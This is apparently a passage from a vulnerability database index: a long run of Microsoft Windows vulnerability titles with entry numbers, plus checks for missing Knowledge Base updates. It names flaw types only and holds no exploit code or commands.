Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63572] Microsoft Exchange Server RPC denial of service [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [61129] Microsoft Windows Kerberos security bypass [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation [60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 